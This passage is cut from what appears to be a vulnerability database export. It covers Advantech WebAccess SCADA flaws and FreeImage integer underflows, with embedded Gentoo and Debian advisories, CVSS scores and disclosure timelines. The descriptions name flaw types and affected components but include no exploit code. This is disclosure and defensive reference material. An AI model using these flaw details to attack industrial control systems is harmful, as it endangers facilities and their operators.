"AdvantechWebAccessCHNNode_20140606_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=50905" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-251" }, { "db": "CNVD", "id": "CNVD-2014-04462" }, { "db": "JVNDB", "id": "JVNDB-2014-003488" }, { "db": "CNNVD", "id": "CNNVD-201407-477" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-2365" } ] }, "references": { "_id": null, "data": [ { "trust": 3.2, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-198-02" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2365" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2365" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/68718" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-251" }, { "db": "CNVD", "id": "CNVD-2014-04462" }, { "db": "VULHUB", "id": "VHN-70304" }, { "db": "JVNDB", "id": "JVNDB-2014-003488" }, { "db": "CNNVD", "id": "CNNVD-201407-477" }, { "db": "NVD", "id": "CVE-2014-2365" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1", "ident": null }, { "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-14-251", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-04462", "ident": null }, { "db": "VULHUB", "id": "VHN-70304", "ident": null }, { "db": "BID", "id": "68718", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-003488", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201407-477", "ident": null }, { "db": "NVD", "id": "CVE-2014-2365", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-07-22T00:00:00", "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1", "ident": null }, { "date": "2014-07-22T00:00:00", "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-251", "ident": null }, { "date": "2014-07-22T00:00:00", "db": "CNVD", "id": "CNVD-2014-04462", "ident": null }, { "date": "2014-07-19T00:00:00", "db": "VULHUB", "id": "VHN-70304", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "BID", "id": "68718", "ident": null }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003488", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-477", "ident": null }, { "date": "2014-07-19T05:09:27.627000", "db": "NVD", "id": "CVE-2014-2365", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-251", "ident": null }, { "date": "2014-07-22T00:00:00", "db": "CNVD", "id": "CNVD-2014-04462", "ident": null }, { "date": "2014-07-23T00:00:00", "db": "VULHUB", "id": "VHN-70304", "ident": null }, { "date": "2014-07-22T00:07:00", "db": "BID", "id": "68718", "ident": null }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003488", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-477", "ident": null }, { "date": "2024-11-21T02:06:09.417000", "db": "NVD", "id": "CVE-2014-2365", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201407-477" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Remote code execution vulnerability", "sources": [ { "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1" }, { "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-251" }, { "db": "CNVD", "id": "CNVD-2014-04462" } ], "trust": 1.7 }, "type": { "_id": null, "data": "Code injection", "sources": [ { "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1" }, { "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d" } ], "trust": 0.4 } }
var-201708-1582
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.2, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433" }, { "db": "ZDI", "id": "ZDI-17-559" }, { "db": "CNVD", "id": "CNVD-2017-19445" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-559" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-559", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19445", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "49a827b2-41ae-4536-881c-9289b7edd433", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-559", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19445", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433" }, { "db": "ZDI", "id": "ZDI-17-559" }, { "db": "CNVD", "id": "CNVD-2017-19445" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-559" }, { "db": "CNVD", "id": "CNVD-2017-19445" }, { "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433" } ], "trust": 1.35 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-559", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19445", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4086", "trust": 0.7 }, { "db": "IVD", "id": "49A827B2-41AE-4536-881C-9289B7EDD433", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433" }, { "db": "ZDI", "id": "ZDI-17-559" }, { "db": "CNVD", "id": "CNVD-2017-19445" } ] }, "id": "VAR-201708-1582", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433" }, { "db": "CNVD", "id": "CNVD-2017-19445" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433" }, { "db": "CNVD", "id": "CNVD-2017-19445" } ] }, "last_update_date": "2022-05-17T02:04:30.892000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\BF28239A-3823-40FF-BC02-2DA4D9DBB1EEIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-559" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-559/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-559" }, { "db": "CNVD", "id": "CNVD-2017-19445" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433", "ident": null }, { "db": "ZDI", "id": "ZDI-17-559", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19445", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-559", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19445", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-559", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19445", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess TpMegaJVT createStream Heap Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433" }, { "db": "CNVD", "id": "CNVD-2017-19445" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "49a827b2-41ae-4536-881c-9289b7edd433" } ], "trust": 0.2 } }
var-201509-0477
Vulnerability from variot
Multiple integer underflows in PluginPCX.cpp in FreeImage 3.17.0 and earlier allow remote attackers to cause a denial of service (heap memory corruption) via vectors related to the height and width of a window. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. A security vulnerability exists in versions prior to Advantech WebAccess 8.1 that could be exploited by remote attackers to bypass target management requirements and gain access to files or folders.
Gentoo Linux Security Advisory GLSA 201701-68
https://security.gentoo.org/
Severity: Normal Title: FreeImage: Multiple vulnerabilities Date: January 29, 2017 Bugs: #559006, #596350 ID: 201701-68
Synopsis
Multiple vulnerabilities have been found in FreeImage, the worst of which may allow execution of arbitrary code
Background
FreeImage is an Open Source library project for developers who would like to support popular graphics image formats like PNG, BMP, JPEG, TIFF and others as needed by today's multimedia applications.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/freeimage < 3.15.4-r1 >= 3.15.4-r1
Description
Multiple vulnerabilities have been discovered in in FreeImage. Please review the CVE identifiers referenced below for details.
Impact
A remote attacker, by enticing a user to process a specially crafted image file, could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition.
Workaround
There is no known workaround at this time.
Resolution
All FreeImage users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/freeimage-3.15.4-r1"=
References
[ 1 ] CVE-2015-0852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0852 [ 2 ] CVE-2016-5684 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5684
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201701-68
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--khJbrB6DMl2G6hkl20s9gHxAo7WDBktBO--
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-3392-1 security@debian.org https://www.debian.org/security/ Sebastien Delafond November 04, 2015 https://www.debian.org/security/faq
Package : freeimage CVE ID : CVE-2015-0852 Debian Bug : 797165
Pengsu Cheng discovered that FreeImage, a library for graphic image formats, contained multiple integer underflows that could lead to a denial of service: remote attackers were able to trigger a crash by supplying a specially crafted image.
For the oldstable distribution (wheezy), this problem has been fixed in version 3.15.1-1.1.
For the stable distribution (jessie), this problem has been fixed in version 3.15.4-4.2.
For the testing distribution (stretch) and unstable distribution (sid), this problem has been fixed in version 3.15.4-6.
We recommend that you upgrade your freeimage packages.
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v2
iQEcBAEBCgAGBQJWOc9cAAoJEBC+iYPz1Z1kC/UH/AhAe5MJ9NSS9wT95K5qhe/Z m4FKLdGDzGqWY82DhWyNYVTTeKit44rR70HnMQ4Ekj/s0SmOyXDAwhE5FR0lLnhW MM5U4Ub3Zhms3uQdayo8tKmlW3eS7lS5w6rpXk0406TVfSy23XUf8C9rjcIVruYS IBa1ROapH2pfo/LwFVwS3fm+ZzQ6M105WV1/TJEXG4sRCLKku470WPr8sDFGgWdZ 7UcdA1q8WbhGaELHI1Z7P86ycuz3hUTO9CzeYgUlcNBCOH27Uo4NiDQ5rOSHIY8N qWLiE8eIlBqn+9Nyr+JcQ1t/mvAI1aAZAfL0w3MUNQ+IPTG6Cx3mbrKTUw5jaLA= =klen -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201509-0477", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "freeimage", "scope": "lte", "trust": 1.0, "vendor": "freeimage", "version": "3.17.0" }, { "model": "freeimage", "scope": "lte", "trust": 0.8, "vendor": "the freeimage", "version": "3.17.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.6, "vendor": "advantech", "version": "8.1" }, { "model": "freeimage", "scope": "eq", "trust": 0.6, "vendor": "freeimage", "version": "3.17.0" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "JVNDB", "id": "JVNDB-2015-005003" }, { "db": "CNNVD", "id": "CNNVD-201509-588" }, { "db": "NVD", "id": "CVE-2015-0852" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:freeimage_project:freeimage", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-005003" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Gentoo", "sources": [ { "db": "PACKETSTORM", "id": "140773" } ], "trust": 0.1 }, "cve": "CVE-2015-0852", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2015-0852", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2016-00430", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-0852", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2015-0852", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-00430", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201509-588", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-0852", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULMON", "id": "CVE-2015-0852" }, { "db": "JVNDB", "id": "JVNDB-2015-005003" }, { "db": "CNNVD", "id": "CNNVD-201509-588" }, { "db": "NVD", "id": "CVE-2015-0852" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple integer underflows in PluginPCX.cpp in FreeImage 3.17.0 and earlier allow remote attackers to cause a denial of service (heap memory corruption) via vectors related to the height and width of a window. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. A security vulnerability exists in versions prior to Advantech WebAccess 8.1 that could be exploited by remote attackers to bypass target management requirements and gain access to files or folders. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201701-68\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: FreeImage: Multiple vulnerabilities\n Date: January 29, 2017\n Bugs: #559006, #596350\n ID: 201701-68\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in FreeImage, the worst of\nwhich may allow execution of arbitrary code\n\nBackground\n==========\n\nFreeImage is an Open Source library project for developers who would\nlike to support popular graphics image formats like PNG, BMP, JPEG,\nTIFF and others as needed by today\u0027s multimedia applications. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 media-libs/freeimage \u003c 3.15.4-r1 \u003e= 3.15.4-r1\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in in FreeImage. Please\nreview the CVE identifiers referenced below for details. \n\nImpact\n======\n\nA remote attacker, by enticing a user to process a specially crafted\nimage file, could possibly execute arbitrary code with the privileges\nof the process or cause a Denial of Service condition. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll FreeImage users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/freeimage-3.15.4-r1\"=\n\n\nReferences\n==========\n\n[ 1 ] CVE-2015-0852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0852\n[ 2 ] CVE-2016-5684\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5684\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201701-68\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n--khJbrB6DMl2G6hkl20s9gHxAo7WDBktBO--\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3392-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nNovember 04, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : freeimage\nCVE ID : CVE-2015-0852\nDebian Bug : 797165\n\nPengsu Cheng discovered that FreeImage, a library for graphic image\nformats, contained multiple integer underflows that could lead to a\ndenial of service: remote attackers were able to trigger a crash by\nsupplying a specially crafted image. \n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 3.15.1-1.1. \n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 3.15.4-4.2. \n\nFor the testing distribution (stretch) and unstable distribution\n(sid), this problem has been fixed in version 3.15.4-6. \n\nWe recommend that you upgrade your freeimage packages. \n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2\n\niQEcBAEBCgAGBQJWOc9cAAoJEBC+iYPz1Z1kC/UH/AhAe5MJ9NSS9wT95K5qhe/Z\nm4FKLdGDzGqWY82DhWyNYVTTeKit44rR70HnMQ4Ekj/s0SmOyXDAwhE5FR0lLnhW\nMM5U4Ub3Zhms3uQdayo8tKmlW3eS7lS5w6rpXk0406TVfSy23XUf8C9rjcIVruYS\nIBa1ROapH2pfo/LwFVwS3fm+ZzQ6M105WV1/TJEXG4sRCLKku470WPr8sDFGgWdZ\n7UcdA1q8WbhGaELHI1Z7P86ycuz3hUTO9CzeYgUlcNBCOH27Uo4NiDQ5rOSHIY8N\nqWLiE8eIlBqn+9Nyr+JcQ1t/mvAI1aAZAfL0w3MUNQ+IPTG6Cx3mbrKTUw5jaLA=\n=klen\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2015-0852" }, { "db": "JVNDB", "id": "JVNDB-2015-005003" }, { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULMON", "id": "CVE-2015-0852" }, { "db": "PACKETSTORM", "id": "140773" }, { "db": "PACKETSTORM", "id": "134214" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-0852", "trust": 3.3 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2015/08/28/1", "trust": 2.5 }, { "db": "SECTRACK", "id": "1034077", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2015-005003", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2016-00430", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201509-588", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2015-0852", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140773", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134214", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00430" }, { "db": "VULMON", "id": "CVE-2015-0852" }, { "db": "JVNDB", "id": "JVNDB-2015-005003" }, { "db": "PACKETSTORM", "id": "140773" }, { "db": "PACKETSTORM", "id": "134214" }, { "db": "CNNVD", "id": "CNNVD-201509-588" }, { "db": "NVD", "id": "CVE-2015-0852" } ] }, "id": "VAR-201509-0477", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2016-00430" } ], "trust": 1.0347069599999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00430" } ] }, "last_update_date": "2024-11-23T21:43:22.853000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "797165", "trust": 0.8, "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=797165" }, { "title": "FEDORA-2015-16106", "trust": 0.8, "url": "https://lists.fedoraproject.org/pipermail/package-announce/2015-September/167766.html" }, { "title": "Top Page", "trust": 0.8, "url": "http://freeimage.sourceforge.net/" }, { "title": "Advantech WebAccess security restrictions bypass the patch for the vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70375" }, { "title": "Debian CVElist Bug Report Logs: CVE-2015-0852: integer overflow in PluginPCX.cpp", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=52aa225fa9ef427fbf5d092e1fe9b6ed" }, { "title": "Debian Security Advisories: DSA-3392-1 freeimage -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=94e9b5a5aec8b21eb715ae1aa90f7b2a" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2019", "trust": 0.1, "url": 